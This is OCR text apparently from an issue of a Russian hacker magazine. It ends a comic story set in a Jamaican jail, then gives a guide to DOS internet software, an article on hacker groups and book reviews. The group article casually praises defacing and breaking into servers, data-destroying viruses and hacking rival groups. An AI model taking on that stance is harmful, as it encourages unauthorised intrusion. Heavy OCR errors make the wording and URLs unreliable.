- Кто урод вонючий, а кто и сам дурак. Воды с 
семи утра в тюрьме нет, понял? Отключили. 
Вот щас к вам главный товарищ Суаддекс при- 
дет - с ним и разбирайтесь. - ответил неожи- 
данно безо всякого акцента охранник, и слил- 
ся. 

Мы остались в камере с макаронами в ру- 
ках. 


- И чего, как их есть, кто-нибудь знает? - Миха 
разделил макароны на пучки, и раздал нам. Мы 
дружно захрустели. 

- А что, нормально, - заявил Добрянский. - Хоть 
не овсянка, и не рыбий жир, как в первый день. 
- Угу. - подтвердил Алекс, хрустя сушняком. - 
Сейчас бы ещё кетчупа... 

Послышались шаги по коридору. Я поперхнул- 
ся. 

По ту сторону решетки стоял... Сайдекс. Его 
сопровождал всё тот же тюремщик с дубинкой. 


Исламский сепаратист 


- Так вот, кто поработил Ямайку? - Центнер 
был в бешенстве. - Ты? Ты унизил этих нес- 
частных людей? Ты, который задержал две 
полосы материалов в последний номер Х? 
Ты ещё и сепаратист? И фабрику ты разру- 
wun? 

- И чего? - нагло спросил Сайдекс. - Nogpa- 
батываю я тут, ясно? 

- Ничего не ясно. - я был удивлен не мень- 
ше остальных. - Тебя сюда какая лошадь 
занесла? 

- Ятут по поручению правительства России! 
- Сайдекс гордо поднял голову. - Пришло 
время освободить остров от капиталисти- 
ческого гнета! И вообще! 

- И вообще! Открывай и выпускай нас! А то 
нас Покровский в Москве заждался! - зая- 
вил Добрянский, выпятив нижнюю губу: 

- Таак, понятно. - Сайдекс Суаддексович 
был явно недоволен. - Карроче - дело к но- 
чи! Этих дятлов’ - не выпускать и не кор- 
мить, а там будет видно. 

Охранник козырнул, и Сайдекс потопал к 
выходу. Когда он скрылся из глаз, секьюри- 
ти показал нам кулак, почесался, и отпра- 
вился вслед. 

Итак, визит Суаддекса ибн Рахита, или 
попросту Сайдекса, нам ничего не дал. И 
теперь нужно было нечто. Нужно было что- 
то, что могло бы вытащить всю честную 
компанию обратно домой. Нужно было ка- 
кое-нибудь чудо. Хоть небольшое, 

День тянулся на удивление долго. К вечеру 
в дикой жарище мы были похожи на четвер- 
ку вареных кур. 

Потом наступила ночь. Мы почти He разго- 
варивали, пытаясь заснуть. И вдруг... 
Воздух прорезал звук реактивных двигате- 
лей. На Ямайскую ВПП садился самолет! 
Кого бы не занесло на Ямайку в такой поз- 
дний час - мы обязательно должны с ним 
увидеться! Кроме того, было предчувствие, 
что этот визит - вполне про нашу честь. 
Мы ждали. Прошло примерно пол-часа, и 
наконец, дверь в участок отворилась, во- 
шел Сайдекс, и с ним кто-то ещё... Вклю- 
чился свет. У двери камеры стоял... Прези- 
дент Владимир Путин. 


Президенты тоже любят 


регги 


- Так кто это, Суаддекс ибн Рахитович? - Пу- 
тин серьёзно посмотрел на Сайдекса, потом 
принялся разглядывать нас, как будто выгля- 
дывая знакомое лицо. Мы, остолбенев, мол- 
чали. 

- А это... - Сайдекс явно замялся. - А это - на- 
ши террористы. Белорусские шпионы по на- 
циональности. Они хотели взорвать Ямай- 
скую Фабрику Имени Пятидесятилетия Крас- 
ного Октября По Производству Бананов. Но я 
лично случайно оказался поблизости, и почти 
предотвратил взрывоопасную ситуацию. 
Правда фабрика сама сгорела на следующий 
день от ‘подрыва производства. Но вот им тут 
всё равно самое место. 

- Господин президент! - я понял, что именно 
сейчас пришла пора вмешаться. - владимир 
Владимирович! Мы - граждане России, кото- 
рых этот нехороший человек незаконно зак- 
лючил под стражу, и требуем нашего немед- 
ленного освобождения. 

- Хе-хе, граждане России! - Сайд заулыбался. 
- У вас хоть ‘белорусские документы-то есть? 
И тут я понял, что все документы остались в 
Москве, в угнанной машине, в бардачке. 

Тем временем, выяснилось, что документы 
нам всё-таки не понадобятся - события про- 
должали развиваться сами собой. 

- XM, - сказал президент. - Так, гаврики, зна- 
чит: это вы. Тоже мне, белорусы! И кому из 
вас в голову пришла замечательная идея по- 
заимствовать мою машину? Обещаю: OH в 
ближайшие пол-года будет лес вместо-серве- 
ров валить. - условно, правда, но BCé равно 
неприятно будет, гарантирую. 

- Ему! - мы все хором показали пальцем на 
диктатора - самозванца. 

- Ага! - сказал президент. - А права в бардач- 
ке - твои. 

И показал пальцем на меня. 

Сайдекс едва‘удержался, чтоб не засмеяться. 
- Ты чего-ржешь, а? - президент окончатель- 
но рассердился. - Щас я тебе сделаю... им- 
пичмент. А ну давай, неси ключи от камеры! 
Сайдекс что-то промычал себе под нос, и по- 
ковылял за ключами... 

И тут всё объяснилось. Вот почему наш авто- 
мобиль в Москве никто не разу не остановил! 
Вот кому он принадлежал!.. 

- ...а когда этот чертов Суаддекс вернется в 
Москву - сниму с занимаемой должности и 
выселю за пределы МКАД! - грохотал прези- 
дент. 

- А нам что делать? - спросил Добрянский. 

- А вам? Вам - ничего. Сейчас домой полетим, 
а там - видно будет. Кстати, срач в моем са- 
молете тоже вы навели? - президент помор- 
щился. - Кошмар! Гомосексуалисты прокля- 
тые! Весь салон в презервативах! 
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- Это не гомосексуализм, это опыты по тран- 
спортировке жидкостей на небольшие рас- 
стояния. - пробубнил Добрянский. 

Ну да, рассказывай. - Президент подобрел, 
взял у подошедшего Сайдекса ключи. - Ви- 
дал, вон, что мой шельмец натворил? Хули- 
raHbé! OH у меня в Москве работал управляю- 
щим делами президента (то есть, меня) по 
вопросам ассенизации на пол-ставки по обме- 
ну с республикой Ямайка. Ну, я его по дол- 
жности сюда отправил - канализацией зани- 
маться. А он - производство бананов разва- 
лил, Москва уже неделю без них сидит, да 
ещё и регги прикрыл - это последняя капля 
была! Я об этом от Геры Моралеса узнал, ког- 
да на его концерт в “Китайский Летчик" прие- 
хал. И дернуло же меня без водителя пое- 
хать! 

- В “Китайский Летчик"? - Док удивился боль- 
ше всех. 

- А что? - сказал президент. - Президенты то- 
же любят регги! Надо же отдыхать хоть иног- 
да. Вот я и выбрался раз в году. Послушал, 
называется, любимую музыку... 

Тут я попытался взять инициативу в свои ру- 
ки. 

- Владимир Владимирович! Вы уж извините 
нас за машину! Hy оченьнадо было на Ямай- 
ку! 

- За Jamaxixyc Ustarende? - улыбнулся прези- 
дент. 

- А вы откуда знаете? - вылупил глаза Алек- 
сей. 

- Я обладаю абсолютным знанием! - ответил 
Владимир Владимирович, блестя глазами. 
Больше мы у него весь’ полет до Москвы ни- 
чего не спрашивали. 


Заключение 


Президентский самолет снижался над Ше- 
реметьево - 1. 

~ A всё-таки не привезли мы траву, ребята. 
Пустую ходку на Ямайку сделали, полу- 
чается. - сказал Центнер. - И Серегу, на- 
верное, уже соседи в больницу сдали. 

- Да ладно! - сказал Алексей. - Белая го- 
рячка иногда проходит за пять-семь дней, 
сама, Вот увидите. 

Так оно и вышло. Не успел самолет подру- 
лить к зданию аэропорта, как я увидел в 
иллюминаторе знакомую фигурку. Фигурка 
была тощая, небритая, и, судя по всему, 
шмыгала носом. 

- Серега! Ты выздоровел? - не успев сойти 
на землю воскликнул Добрянский. - Как же 
ты умудрился? 

- Как - как... Выспался, позавтракал, и - 
работать. - скромно ответил Покровский, 
вручая Феде показательный бу- 

кет цветов. Номер сдаем, всё- 

таки... if 
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ПОТЯНЕТ 


Как выжить nog 


CUTTER (CUTTER@XAKEP.RU) HTTP://WWW.LOVEGCITY.RU 


елезо нынче дорого. Причем, денег 

за последние несколько лет у нас 

больше не стало. Это я к чему? К то- 
му, что часто натыкаюсь на людей, которые, 
приходя ко мне, просят: Катор, у меня мама-па- 
па небогатые, кушать нечего, собери мне маши- 
ну, а? Ну хоть какую-нибудь. Впоследствии 
выясняется, что “какую-нибудь” означает “та- 
кую, чтоб можно было в инет выходить, гамить- 
ся, почту принимать, и быстро", и, как правило, 
“не дороже 100 - 150 баков, а то я уже пол-года 
коплю, и у меня больше нету"... Что, скажешь, 
нереально? 


Во-первых, никогда не смейся над такими людь- 
ми. В похожую финансовую ситуацию может по- 
пасть каждый. И ты тоже. Во-вторых, я сам од- 
нажды был вынужден распрощаться со своей 
тачкой, и остался с точно такой же суммой на 
руках. И мне тоже было нужно выходить в инет, 
редактировать тексты, отправлять почту... 


SCRIPIT 


Для тебя He секрет, что 386 или 386 тачку 
вместе с монитором можно купить на митино- 
Oazzape баксов за 100-130. А на такой маши- 
не ДОС и 3.хх Винды будут работать офиги- 
тельно! И не смейся. С такой тачки можно 
полноценно выходить в Интернет, серфить по 
вебсайтам, зависать в WWW-4YaTax (это ближе 
к девушкам ;)) да и вообще хакать, ломать, 
крушить, т.е. делать то, что ты любишь :). Об 
играх даже говорить не стоит, потому что их 
вышло просто недетское количество! 


Сейчас, как нельзя кстати, придется к месту пес- 
ня о старом Досе. “Дос, черной пеленой экран 
заполнил чистый floc:”. Хех, ностальгия: Так 
BOT, будем учиться полноценно работать в MS- 
005'е. Почему в нем? Да потому, что эта ОС яв- 
ляется реально качественной, работает на всех 
(без исключения) писюках. Для тебя не секрет, 
что 386 или 386 тачку вместе с монитором мож- 
но купить на митиноба2таре баксов за 100-130. 
А на такой машине ДОС и 3.хх Винды будут ра- 
ботать офигительно! И не смейся. С такой тачки 
можно полноценно выходить в Интернет, сер- 


фить по вебсайтам, зависать в WWW-HaTAaXx (это 
ближе к девушкам ;)) да и вообще хакать, ло- 
мать, крушить, т.е. делать то, что ты любишь :). 
06 играх даже говорить не стоит, потому что их 
вышло просто недетское количество! 

Все программное обеспечение я тестировал на 
своем компьютере с MS-DOS‘om версии 6.22. 


Для выхода в Инет тебе необходимо скачать 
несколько программ с сервера FDisk.com (эти 


Automated Setup for Wattcp Programs 


Default Values Which Will Be Used Unless Changed 


Interrupt= 4 
Baud Rate = 
Modem Init 

Dialer 


Login Pa 


Чатезегуег #1= 
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Nameserver #2= 


O- EXIT and do 


COM PORT BASE A 


nat 


38400 
Commarncd 
Command = 
Login Name= user 
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None 
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Enter (1-9) to change ... 
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Спросят, а не сохранить ли изменения - конеч- 
но, подтверди сохранение. Теперь запуская 
программу bcatdial.bat, если ты все нас- 
троил/настроила правильно, то модем поднимет 
трубу, начнет звонить, подрубится, создаст РРР- 
соединение и запустит резидентную программу. 
Эта резидентная программа как раз и является 
драйвером, через который происходят соедине- 


FDISK.COM 


Welcome to the FDISK COM DOS Internat Pages These pages are a bit messy at the moment as T am collecting links ts 
break out into seperate formation arcas. you were looking fer the main Lynx home page itor at lee browser ore. 


Here are my links to vancus DOS internet programa (mostly web related). IF you knew of others pust ¢-mad me with the URL 
and T would be happy to melude them here: 


2. А риа proarese of Lynx2.8 for Wind2 (95/NT) as well ac 36+ DOS machines, 


DOS Internet Pages 


а A recited version of Lyn for DOS, B06 and up, 
© Custom Dealer and packet drivers for PPP, Shp & СЗ 


* DOSLYNK Archive 


o My old atterapts at updating the fisnctenalty of DOSLYNX Development har stepped in taver of Bobcat and 


©. A great grapluc browser for ОЗ] 
* WET LS: 3. ЕЕ NI a Very cool Wind and 205 


действия тебе придется делать из под виндов 
или юникса :)). На самом сайте находится раз- 
личный софт не только для MS-DOS, но и туева 
куча всякой шняги :). 

В общем, скачиваешь набор программ Bobcat 
(брать здесь: http://www.fdisk.com/doslynx/bob- 
cat.htm). 

Копируешь скачанное файло на дискету, с нее 
на комп, где находится чистый дос. Скопировал 
Bobcat, распаковываешь его (архив self-extrac- 
tor). Появится куча дополнительных директо- 
рий, два файла: newuser.bat и quickbob.doc. Пус- 
кай newuser.bat, появится экран с настройками. 
1. сот порт. Тут все понятно, от тебя требует 
выбрать в каком Com порту работает твой мо- 
мед. 

2. номер прерывания. Я оставил эту строку как 
есть. 

3. Baud Rate. Максимальная скорость соедине- 


НИЯ. 
4. Строка иницилизации. Ее тоже не менял - ра- 
ботает. Можно поставить АТИ, если у тебя неяс- 
ный момед (на старой тачке, скорее всего, будет 
какой-нть Роботикс 28.8. Да, кстати, ты можешь 
привязать на такую тачку хоть 57600 - и летать 
машина будет в интернете не медленнее, чем 
пень-три! Только момед под Досом лучше внеш- 
ний юзать - с ним проще). 

5. Dialer Command. Эта команда модему для сое- 
динения с твоим провайдером. Если телефон 
провайдера 1234567, то команда, скорее всего, 
будет ATDP1234567. 

6. Твой логин. 

7. Твой пароль. 

8. Первичный DNS сервер. 

9. Вторичный DNS сервер. 


После того, как все настроишь, жми Escape. 


oe ee a 


== 


2 ieee We ea oe ee и 


ния tcp/ip. Если немного подправить этот файл, 
то можно создать SLIP соединение. 

Потом запустится браузер lynx (да, это та самая 
http-cmoTpenka, которая по умолчанию ставится 
в ипх‘оксоподобных системах). Ты, наверное, 
растроишься, когда увидишь, что браузер тек- 
стовой, но привыкнуть к нему совсем не трудно. 
Lynx поддерживает как И р-запросы, так и ftp, 
поначалу этого хватит... но ненадолго :(. Для 
куль-хаксоров в состав Bobcat входит Telnet- 
программа, так что пингование твоих друзей и 
прочей интернетовской живности тебе обеспе- 
чено, конечно, если у тебя есть какой-нибудь 
shell. Но в последнее время все больше удален- 
ных шеллов работает через ssh, поэтому прос- 
той {епе(-клиент тебя не спасет... Но не горюй, 
под DOS тоже существуют °°Й-клиенты (06 этом 
дальше) - это тебе, конечно, не SecureCRT, но 
тоже неплохо :). 
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http://www.simtel.net/simtel.net/msdos/index- 


msdos.html 


Еще один большой сайт по Досу, тут в алфа- 
витном порядке расположены различные ути- 
литы под дос. Есть и различные утилиты для 
CD-ROM’a, куча небольших компиляторов. В 


общем 4 с плюсом. 


В состав пакета входит какая-то программа 
MINUET (то ли я развращенный стал, то ли 
английский совсем плохо знаю ;)). По назва- 
нию даже не догадаешься, что же она делает 
- наверное, доставляет физическое удоволь- 
ствие. Да не тут-то было, под супер-кодовым 
названием скрывается обычный тай-клиент 
(на самом деле, самого ехе-файла программы 
нету его нужно сказать здесь: 
http://www. fdisk.com/doslynx/minuet/). 

С помощью этой тулзы можно отправлять 
письма по $МТР-протоколу, и скачивать поч- 
Ty с РОРЗ-серверов. 

А что делать любителям посерфить в графи- 
ческом режиме? Такие перцы тоже не оста- 
лись в стороне, особенно любители порнушки 
:). Для них оптимальным вариантом будет ис- 
пользование браузера Arachne. Работает он 
во всех 5\/СА-режимах (640х480, 800х600, 
1024х786) - правда, только с 256 цветами, но 
это можно пережить. Требования к твоему 
компу: 

1. MS-DOS начиная с версии 3.3 

2. x86 процессор 

3. SVGA карточка 

4. Мышь 

Как видишь, требования к железу минималь- 
ны. В качестве Packer Driver’a подойдет и 
Bobcat Dialer из пакета Bobcat. Программа 


легка в использовании - в общем, разобрать- 
ся в ней просто. Это тебе, конечно, не 
Internet Explorer и не Netscape Navigator, но 
работать в нем все же намного приятнее, чем 
в lynx’e, Arachne, грубо говоря, хреново пони- „- > 
мает CSS, из-за чего многие сайты будут ( Кодеру ) 
смотреться убого, но все же основной HTML XN я 


OH понимает. Download 
http://browser.arachne.cz. 

Это далеко не все браузеры, которые сущес- 
твуют под досом. Так, есть бродилка Knots, 
SPIN, Open World Navigator, WebBoy. Все они 
работают в графическом режиме, сам я их не 
тестировал, но все же советую попробовать, 
авось понравится :). 


Хере: 


ia ’ 


( Примочки 

м. 
Это часть раздела для элитных парней :). Я был 
приятно удивлен, когда нашел $°П-клиент под 
DOS. Обозвали его банально - SSHDOS. Прог- 
рамма оказалась open source, поэтому особо 
страждущие кодеры могут внести свои измене- 
ния в исходниках. Программа эмулирует режим 
терминала \Т100, поддерживает шифрацию 
3DES и BlowFish - этого, несомненно, хватит. 
Теперь ты сможешь скачивать различные 
эксплоиты, компилить их - одним словом, хакать 
вебсервера и выполнять дефейсы из nog DOS’a. 


Для работы SSHDOS необходимо скачать еще 
две программы: Wattcp и Putty. Их адреса ты 
найдешь на ХомПаге SSHDOS’a: http://www.- 
vein.hu/%7Enagyd/sshdos.html. 

Я хотел бы затронуть вопрос и об IRC. Kak ни 
странно, но 1КС-программы существуют и в До- 
се. Trumpet (http://www.trumpet.com.au) - это 
тебе и newsreader, и простой !гс-клиент. Других 
программ такого рода я не встречал, но есть и 
другой способ посидеть в IRC. Например, на 
шелле можно установить BitchX, и тогда можно 
беззаботно болтать в ирке. Или установить на 
каком-нибудь сайте CGI 1ВС-клиент Whiplash. 
Это не очень разумный подход, но зато работает 
на 100%. 

Радует, что есть и всенародная известность - 
ICQ. Эта клавдия работает в текстовом режи- 
ме, и называется MICQ (http://members.-tri- 
pod.com/~ladsoft/). Также LADsoft сделала 
Real Aidio Player под Dos. Это похвально, и са- 
мое интересное, что сделано это все на голом 
энтузиазме, как и многие программы под До- 
сом. 

Юниксоиды обрадуются, увидев портирован- 
ный e-mail клиент PINE http://www.washing- 
ton.edu/pine/pc-pine). Но это еще ладно, я 
совсем припух, когда обнаружил X-Windos 
под DOS!!! Называется он X-Appeal, а перено- 
сили его с никсов вообще какие-то странные 
люди. Качать здесь: — http://www.xtre- 
me.it/xtreme.html. 

Но и это еще не все. Оказывается, под Дос сде- 
лан wenn bash и ksh, свихнуться можно! Оста- 
лось только добавить возможность переключать 
консоли. Вот их адреса: http://www.neongene- 
sis.com/~jack/djgpp-work/beta/index.html и 
http://ftp.kiarchive.ru/pub/msdos/unixlike/korn/. 


31337 кодеров тоже не оставили в стороне, для 
них давно существуют компиляторы и для с/с++ 
и для паскаля, но также теперь есть возможнос- 
ть писать скрипты и на моем любимом Перле, и 
даже на Python’e. То есть, писать СС[-шки мож- 
но в MS-DOS’e. Конечно, это тебе не Windows, и 
не никсоподобная система. Рей под дос можно 
скачать с http://www.activestate.com, там же ес- 
ть и обычная версия под Винды. Питончика бе- 
ри отсюда: 
http://www.cuci.nl/~hnowak/html/python- 
dx.html. Сам я его не тестил, HO на сайте заяв- 
ляют, что все шоколадно - в общем, все рабо- 
тает. Жалко, но РНР nog DOS я не встретил. Но 
ты поищи, если больно приспичит - скорее все- 
го, результат будет положительный. 

Вот все, что я хотел тебе сказать про ДОС. Как 
видишь, я затронул только Интернетовскую час- 
ть, так как остального софта (не сетевого) нас- 
только много, что рассказать в одном номере об 
этом просто невозможно. Если будет интересно - 
пиши, помогу-чем-смогу. Удачи! 


TYCOBHA 
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ЧТО ВНУТРИ 


У ХАКЕРСКОЧ ГРУППЫ? 


NOAH (NOAH@INBOX.RU, UIN 983332) 


CBOPA БЕШЕНЫХ KABEP- 
ПСОВ 


Хакерские группы. Они творят беспредел на 
информационных просторах. Если отдель- 
ный хацкер “берет” сервер долгим кропот- 
ливым трудом, команда хацкеров “выносит” 
цель одной скоординированной атакой. От- 
дельному хакеру часто не хватает времени, 
чтобы зарелизить написанный им хацкер- 
ский софт, максимум - выложить одному 
лишь ему понятный исходник. Что уж гово- 
рить на этом фоне о малварных релизах, ко- 
торыми изобилуют паги хак-групп. Как же 
создаются хацкерские группы? Кто в них? 
06 этом - ниже. 


СОЗДАНИЕ 


Почему рождаются дети? Потому что слу- 
чайно или специально в одном небольшом 
участке пространства оказываются один 
мужчина и одна женщина (в самом нормаль- 
ном случае ;)). А если вместо мужчины и 
женщины там оказывается несколько хацке- 
ров - рождаются хак-группы. Ими движет 
обыкновенное, свойственное всем людям 
желание (не то, о котором ты подумал) - 
объединить свои усилия на создании чего- 
то большего. В самом начале большинство 
хацкерских команд рождались в результате 
общения хакеров в реале, но потом, в связи 


с бурным развитием Инета, люди начали 
создавать команды прямо в онлайне, И сей- 
час существует много групп, члены которых 
даже не видели друг друга RL, но с большим 
успехом вместе хакают :). 


СТРУКТУРА 


Почти в каждой хакерской группе есть свой 
самый главный перец, Как его только не на- 
зывают: наставник, президент (прикинь, и 
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такое бывает), лидер, босс... В одних ко- 
мандах в его обязанности входит организо- 
вывать что-то там, координировать хак, 
подбирать цели для взлома, в других - он 
отличается от рядового члена только тем, 
что больше разговаривает :). В общем же 
случае, это просто такой уважаемый всеми 
остальными мемберами человек, который 
может влиять на исход решений тех или 
иных важных внутрикомандных вопросов. 
Обычно это место занимает кто-то из самых 
первых членов группы. 

Еще одна обязательная фигура в любой хак- 
группе - веб-мастер. Без этого перца далеко 
не уйдешь, так как кто-то должен серьезно 
заниматься сайтом команды. Правда, бывает 
и такое, что команда не хочет светиться, не 
гонится за раскруткой своего имени и не 
держит сайтов в вебе. В небольших группах 
(пять-шесть челов) в общем-то больше ни- 
каких других должностей и не бывает, а вот 
в больших (двадцать-тридцать чел) их по- 
больше. 


У серьезных, хорошо известных групп бы- 
вают свои пресс-секретари. Чего ты хохо- 
чешь, ты даже не представляешь, какую 
чушь иногда (часто!) пишут в газетах о ха- 
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керах и о хак-группах. Должен же кто-то за 
этим следить, проверять, чтоб кто-нибудь 
случайно неоправданно не облил группу 
грязью или еще чего напридумывал о ней 
лишнего. 

Бывают специальные перцы, которые пишут 
документацию (но это не означает, что они 
только этим и занимаются). Ну, скажем, на- 
ломала команда какой-нибудь сервак, так 
эти перцы берут и описывают все очень под- 
робно, чтоб и другие люди узнали, как это 
делается :). 

В хорошо сбитой хак-группе все ее члены 
подтачивают свои знания под что-то кон- 
кретное: кто-то спец по UNIX, кто-то по NT, 
кто-то по протоколам, кто-то по кодингу. К 
таким спецам можно обращаться за по- 
мощью, если чего-то в ходе хака непонятно 
или если надо получить какие-то специфи- 
ческие сведения. 

Кроме всего прочего, в большинстве групп 
все их члены делятся на новичков и древ- 
них :). 


ПУСТИТЕ МЕНЯ В СВОЮ 
ПЕСОЧНИЦУ! 


Прежде чем проситься к кому-нибудь в пе- 
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сочницу (читай в хак-группу), надо этого 
кого-нибудь сначала найти. Сделать это до- 
вольно непросто. Не в том смысле, что най- 
ти хак-группу сложно, а в том смысле, что 
сложно найти хак-группу, деятельность KO- 
торой заинтересует тебя и уровень которой 
будет соответствовать твоему уровню. Надо 
будет походить по irc, полазать в вебе, по- 
говорить со знакомыми пиплами по аське. 
Если же тебе по фигу, что, где и как ломать, 
то можешь заджоиниться практически в лю- 
бую команду. Все это относится к таким 
случаям, когда тебе просто целенаправлен- 
но хочется стать членом какой-нибудь хак- 
команды. На самом же деле, люди, всту- 
пающие в хак-группы, обычно давно и хо- 
рошо бывают знакомы со многими ее члена- 
ми. Интересы-то у них общие (раз ему инте- 
ресно туда вступать) - вот и тусуются в од- 
них и тех же местах. 

Если ты серьезно подошел к подбору подхо- 
дящей тебе хак-группы, то тебя, скорее 
всего, в нее примут - вопрос в том, хватит 
ли у тебя знаний, чтобы удержаться в ней. 
Неактивных, безрезультатных членов обыч- 
но отсеивают. Так что раз уж вступил в ко- 
манду, будь добор выкладываться для об- 
щего дела по полной программе. Если же ты 
нарвался на понтовиков, которые только и 
делают, что говорят, типа: “Нам больше 
никто не нужен. Мы и так крутые”, - плюнь 
(желательно прямо им в лицо) и размажь. 
Это неумные люди, с ними бесполезно 
иметь дело. Знай, что любая нормальная 
хацкерская группа, какой бы крутой они ни 
была - даже самая элитная, - время от вре- 
мени пополняет свои ряды новыми члена- 
ми. Только учитывай, пожалуйста, в своем 
выборе свой уровень и уровень команды, в 
которую хочешь вступить - никому не из- 
вестного перца в элитную команду не возь- 
мут, а вот перца средней раскрученности в 
такую же команду берут с удовольствием :). 
Ну а если ты уже успел положить сотню- 
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И вообще, быть, пардон, членом хак- 
группы - это не так просто, как быть, 
например, мочевым пузырем. 
Ответственность, понимаешь, другого 


уровня! 


другую серваков, твой зверский вирус унич- 
тожил не один терабайт полезной информа- 
ции, ты прочел несколько гигов доков, ста- 
тей, мануалов и прочей инфы, крякнул пару 
сотен прог и имел честь лично потрогать 
грудь г-жи Андерсон (впрочем, последний 
пункт не совсем обязателен), то, я думаю, 
тебя с руками оторвет любая элитная хац- 
керская группа. Но уже позно :) - теперь 
они тебе не нужны - надо было вовремя 
брать, а сейчас ты сам можешь сколотить 
команду, не хуже их :). 


СКОЛОТИМ СВОЮ ХАК- 
ГРУППУ! 


Ну что ж, могу дать тебе пару советов: 

1. Самый важный совет. Прежде чем орать 
на весь Инет о существовании своей хак-ко- 
манды, потрудись сначала достигнуть хоть 
каких-нибудь значимых результатов. Рас- 
кручивать команду, не имея за спиной ни 
опыта, ни релизов, ни дефейсов, - глупо. В 
лучшем случае все сведется к созданию 
паги с хацкерским содержанием, а в худ- 
шем... ну, а в худшем - твоя команда пог- 
рязнет в словесных перепалках с другими 
такими же кривыми командами либо оста- 
нется вообще никем не замеченной (если 
будете орать очень сильно, вас заметят, но 
лучше от этого не станет - все будут считать 
вас выскочками). 


2. Не бери в свою группу кого попало, а то 
она превратится в настоящую свалку. Нет, я 
не говорю, что надо задрать нос и устраи- 
вать жесточайшие тесты всем желающим 
заджоиниться к тебе с первого же дня су- 
ществования твоей команды. В самом нача- 
ле принимай всех, присматривайся, кто как 
работает, кто насколько грамотен, а потом 
аккуратно ненужных отсеивай. При этом да- 
же не надо говорить, типа: “Ты нам больше 
не нужен, отвали”. Зачем зря людей оби- 
жать? Просто не держи их в курсе дел ко- 
манды, и, поверь мне, скоро им самим на- 
доест, и они уйдут добровольно :). Когда же 
немного раскрутишься, можешь и вступи- 
тельный тест установить (только вот вступи- 
тельный взнос устанавливать не стоит :)). 


3. Не стоит вступать в словесные перепалки с 
другими хак-группами. Это может закончиться 
крантами для обеих ко- 
манд - просто народ тра- 
тит все свое время на 
ругню в чатах и конфах, 


й забывая, зачем, соб- 
ственно, была создана 
команда. Если кто-то 


наехал на вас, ответьте 
не словом, а делом - 
хакните их как следует, 
как раз сработаетесь на 
таких вещах :). 


TYCOBKHA 


4. He пытайтесь сразу ломать мегакрутые 
сетки - обломаетесь. Несколько таких неу- 
дачных обломов, и командный дух ломает- 
ся (прямо как паршивый сервак). Так что 
надо начинать с самого простого, надо об- 
ретать уверенность в силах своей команды, 
а уж потом можно обламываться сколько 
угодно ;). 


P.S. 

Черт возьми, сколько же раз я употребил 
тут слово “член”? ;) Эх, ну ладно, пора 
нам... Нет-нет, постой, я еще не прощаюсь! 
Кхе-кхе, это... самое... приятель, если ког- 
да-нибудь ты со своей командой доберешь- 
ся до самых вкусных секретов в сетях спец- 
служб и космических агентств - не забывай, 
плиз, про своих хороших друзей из Х, гото- 
вых всегда поделиться с тобой самой рулез- 
ной информацией ;) !!! Ну, а теперь точно 
все. Жду писем о проделках твоей зверской 
хак-группы. Всем Буе! 


Конец GO- 
ых - нача- 
по ЯО-ых 


В этот период произошло очень много 
событий, повлиявших на развитие хака: 
была проложена ARPAnet, были созданы 
UNIX и С. Усилился нескрываемый инте- 
рес студенческой молодежи к компам. 
Они активно участвовали в развитии 
этой технологии, почти не уступая в 
своих достижениях профессионалам. У 
последних они начали перенимать мане- 
ры, повадки и сленг. Появилось новое, 
молодое поколение компьютерщиков. 
Если старшее поколение занималось, в 
основном, фундаментальными разработ- 
ками (осями, технологиями программи- 
рования, сетевыми протоколами), то мо- 
лодое использовало то, что уже есть, 
для создания прикладного софта. Мно- 
гие из этих молодых программистов сей- 
час являются учредителями мощных 
софтварных компаний (да, в том числе и 
столь обожаемый тобой Билл Гейтс :)). 


Книжный 


ОБЗОР 


ULIx & FEDIX (SPORA_2K@MAIL.RU) 


так, начнем наш обсёр... То есть обзор. 
U В общем, здесь ты прочтешь итоги по- 

хода Юликса и Федикса в “Государ- 
ственную научно-техническую библиотеку” 
(ГПНТБ). Отличная библиотека для технаря. 
Фонды пополняются постоянно, в каждом зале 
есть компы, по которым можно найти нужные 
книги. Тихо, удобно, просторно. Нас там только 
не хватало. Вот мы и решили, по заданию Пар- 
тии, нагрянуть за книгами по Хаку - требовалось 
разведать обстановку и выяснить, есть ли вооб- 
ще смысл искать толковую литературу по взло- 
мам в бумажной форме... 


СПРАВОЧНОЕ 


РУКОВОДСТВО 
пол bIORATI| пк 


Tere 


erp oe 


Без секретов 


Хакинг 


Леонтьев Б. Хакинг без секретов. М., ГТоз-— 
навательная книга+, 2000. - 736 с. 


Этот автор отличился больше всех. Он слил в 
свою толстенную книгу в твердой обложке 
все доки из Инета, которые только мог. Прав- 
да, некоторые из них сильно устарели. В 
смысле, совсем устарели. А некоторые доки 
страдают неслабым маразмом, и нужно ше- 
вельнуть извилиной - чему можно верить, а 
чему нет. Далее другие такие книжки мы кла- 
ли на эту жирнющую и фотографировали. 
Рекомендуем фэнам чтения разного бреда (и не 
очень) из Интернета, у которых нет ноутбука. 
Или тем, кому просто лень качать. 


БОРИС OTE 


4 ATE 


Леонтьев Б. Хакеры, взломщики и другие 
информационные убийцы. M., Познава- 
тельная книга+, 1998. - 192 с. 


Это более ранняя книга того же автора. Мы 
даем на нее ссылку, чтобы ты не думал, что 
это безобразие началось недавно. Кстати, в 
далеком 1998 году кто-то даже пытался чуть- 
чуть видоизменять тексты, правда, и книга 
была раз в десять меньше. К двухтысячному 
году на какую-либо правку совсем забили, 
зато стали играть в игру “Кто больше ска- 
чает". Поздравляем с призовыми местами! 
Рекомендуем следователям, любителям старины 
и просто фэнам Леонтьева Бе. 


А это Дымов вместе с толстым Леонтье- 
вым 
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ТУПНО ПРОСТО. 


‚до 


Дымов В. Хакинг и фрикинг: хитрости, 
трюки и секреты. М., Познавательная 
книга+, 2000. - 176 с. 


Тонюсенькая такая книжечка, тоже откуда-то 
слито. Невооруженным глазом отличий от тол- 
стой книжки Леонтьева никаких не видно. По 
толщине они отличаются, а сверстаны и органи- 
зованы примерно одинаково. И тексты подозри- 
тельно похожи. Неужели было сложно хотя бы 
названия глав изменить? 

Рекомендуем дегенератам, которые боятся на- 
дорваться толстенной книжкой Леонтьева Бе. 


А это Левин вместе с толстым Леонтье- 
вым 
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Левин М. Руководство для хакеров. M., 
Оверлей, 2000. - 476 с. 


Отдельное спасибо Левину за то, что к каж- 
дой главе из Леонтьева написал по полторы 
странички бредятины - вступления. Ну а 
дальше, как водится, все слово в слово. 
Рекомендуем тому, кто все-таки решил под- 
нять все эти книжки и провести контрольное 
сравнение. Или тому, кто тоже хочет написать 
свою книгу про хацкеров. Думаю, что нужно 
просто поксерить эту. 


Медведовский И.Д., Семьянов Г1.В., Лео- 
нов Д.Г. Атака Ha Internet. М., ДМК, 1999. 
— 336с. 


